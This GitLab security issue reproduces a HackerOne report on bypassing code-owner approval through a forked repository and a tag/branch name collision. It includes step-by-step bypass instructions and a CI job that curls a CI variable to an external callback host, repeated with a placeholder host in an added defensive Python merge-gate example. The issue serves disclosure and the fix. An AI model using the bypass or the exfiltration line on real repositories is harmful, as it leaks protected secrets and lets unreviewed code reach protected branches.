Bypassing Codeowners approval using a forked repo

⚠ Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #2418591 by ali_shehab on 2024-03-15, assigned to @rshambhuni:


Report

Summary

Hey team, hope you are doing well. I found another way to bypass codeowners approvals, but this time using a forked repo, allowing one to read protected variables of a private group and to push code to a protected branch.

Steps to reproduce

As an owner:

  1. Create a new group, and apply the Ultimate trial to it
  2. Create a new private project in that group
  3. Create a CODEOWNERS file with the following content

     [Code Owners]
     *.yml @OWNER_USERNAME

  4. Create a .gitlab-ci.yml file with the following content

     my_job:
         script:
             - echo "Hello"

  5. Navigate to https://gitlab.com/GROUP/PROJECT/-/settings/repository, allow Developers and Maintainers to merge, and toggle on code owner approval
  6. Navigate to https://gitlab.com/GROUP/PROJECT/-/settings/merge_requests, and enable "Remove approvals by Code Owners if their files changed"
  7. Invite a developer to that group

As the developer:

  1. Fork that project
  2. In the forked project, create a new branch called protected, and add any "safe" change to the .gitlab-ci.yml file, something similar to

     my_job:
         script:
             - echo "Hello, this is safe"

  3. Create an MR targeting the original project's main branch

As the owner:

  1. Approve the MR; at this point the owner is okay with that code being merged into main, as it is safe

As the developer:

  1. In the forked project, create a tag called protected
  2. In the forked project, on the protected branch, add any change to the README.md (this doesn't require a code owner approval) - verify that the changes page in the MR is messed up
  3. Back in the forked project, on the protected branch, add any evil code to the .gitlab-ci.yml, something similar to

     my_job:
         script:
             - echo "Hello, this is safe"

     job_name:
         script:
             - curl -X GET "https://qlfb8ytseezdfmvtee92juuzeqkg85.oastify.com?VAR=$VAR" # any server controlled by the user

  4. Delete the protected tag
  5. On the MR changes page, create a commit that contains any change
  6. Verify that the approval persisted, and merge the MR

Impact

Bypassing codeowners approval allows reading protected variables of the group and project without having permission and, in addition, pushing unapproved code to protected branches.
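The invariant the report shows being violated is that a code-owner approval is bound to the content the approver reviewed, not to the merge request as a whole: once a code-owned file differs from the approved head, the approval must be reset regardless of which refs the MR diff happened to be computed against. The following is an added example, not GitLab's own code, of a pre-merge gate that enforces exactly that. It parses a CODEOWNERS file like the one in the report, then compares the file contents of the approved head against the current head and reports every code-owned path whose content changed. The CODEOWNERS text, the file contents for the three MR heads in the report's timeline (approved, after the README change, after the evil CI change), the placeholder host attacker.example and all function names are constructed for this example; in a real gate the two trees would be built from the approved head SHA and the current head SHA (for example from git ls-tree -r on each).

```python
"""Added example: is a code-owner approval still bound to what was approved?

Not GitLab code. Models the check the report shows failing: an approval
given on one MR head must not survive a later change to a code-owned file.
"""
import fnmatch
from typing import Dict, List, Tuple

# Constructed CODEOWNERS, mirroring the one in the report.
CODEOWNERS = """[Code Owners]
*.yml @OWNER_USERNAME
"""

# Constructed file contents for the MR heads in the report's timeline.
SAFE_CI = 'my_job:\n    script:\n        - echo "Hello, this is safe"\n'
EVIL_CI = SAFE_CI + (
    '\njob_name:\n    script:\n'
    '        - curl -X GET "https://attacker.example?VAR=$VAR"\n'  # placeholder host
)
HEAD_APPROVED = {".gitlab-ci.yml": SAFE_CI, "README.md": "# demo\n"}
HEAD_AFTER_README = {".gitlab-ci.yml": SAFE_CI, "README.md": "# demo\nupdated\n"}
HEAD_AFTER_EVIL = {".gitlab-ci.yml": EVIL_CI, "README.md": "# demo\nupdated\n"}

Rule = Tuple[str, List[str]]


def parse_codeowners(text: str) -> List[Rule]:
    """Parse 'pattern owner...' lines; skips comments, blanks and [Section] headers."""
    rules: List[Rule] = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or (line.startswith("[") and line.endswith("]")):
            continue
        pattern, *owners = line.split()
        rules.append((pattern, owners))
    return rules


def _pattern_matches(pattern: str, path: str) -> bool:
    """Simplified CODEOWNERS globbing: a leading '/' anchors the pattern to the
    repo root, a pattern without '/' matches the file name at any depth, and
    anything else is matched against the full path."""
    if pattern.startswith("/"):
        return fnmatch.fnmatchcase(path, pattern[1:])
    if "/" not in pattern:
        return fnmatch.fnmatchcase(path.rsplit("/", 1)[-1], pattern)
    return fnmatch.fnmatchcase(path, pattern)


def owners_for(path: str, rules: List[Rule]) -> List[str]:
    """Owners of a path; the last matching rule wins, as in CODEOWNERS."""
    owners: List[str] = []
    for pattern, rule_owners in rules:
        if _pattern_matches(pattern, path):
            owners = rule_owners
    return owners


def stale_codeowner_paths(rules: List[Rule],
                          approved: Dict[str, str],
                          current: Dict[str, str]) -> List[str]:
    """Code-owned paths whose content at the current head differs from the
    head the approver reviewed. Additions and deletions count as changes."""
    stale = []
    for path in sorted(set(approved) | set(current)):
        if owners_for(path, rules) and approved.get(path) != current.get(path):
            stale.append(path)
    return stale


def approval_still_valid(codeowners_text: str,
                         approved: Dict[str, str],
                         current: Dict[str, str]) -> bool:
    """True only if no code-owned file changed since the approval was given."""
    return not stale_codeowner_paths(parse_codeowners(codeowners_text), approved, current)


if __name__ == "__main__":
    rules = parse_codeowners(CODEOWNERS)
    # README.md is not code-owned, so the approval may persist.
    print(stale_codeowner_paths(rules, HEAD_APPROVED, HEAD_AFTER_README))  # []
    # .gitlab-ci.yml is code-owned and changed, so the approval must be reset.
    print(stale_codeowner_paths(rules, HEAD_APPROVED, HEAD_AFTER_EVIL))  # ['.gitlab-ci.yml']
```

The gate deliberately keys on per-path content rather than on the list of files shown in the MR changes page: the report's trick of giving a tag and a branch in the fork the same name ("protected") leaves the changes page "messed up", so any check driven by what that page rendered can be misled, whereas a comparison between the approved head's tree and the current head's tree cannot.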

How To Reproduce

Please add reproducibility information to this section:
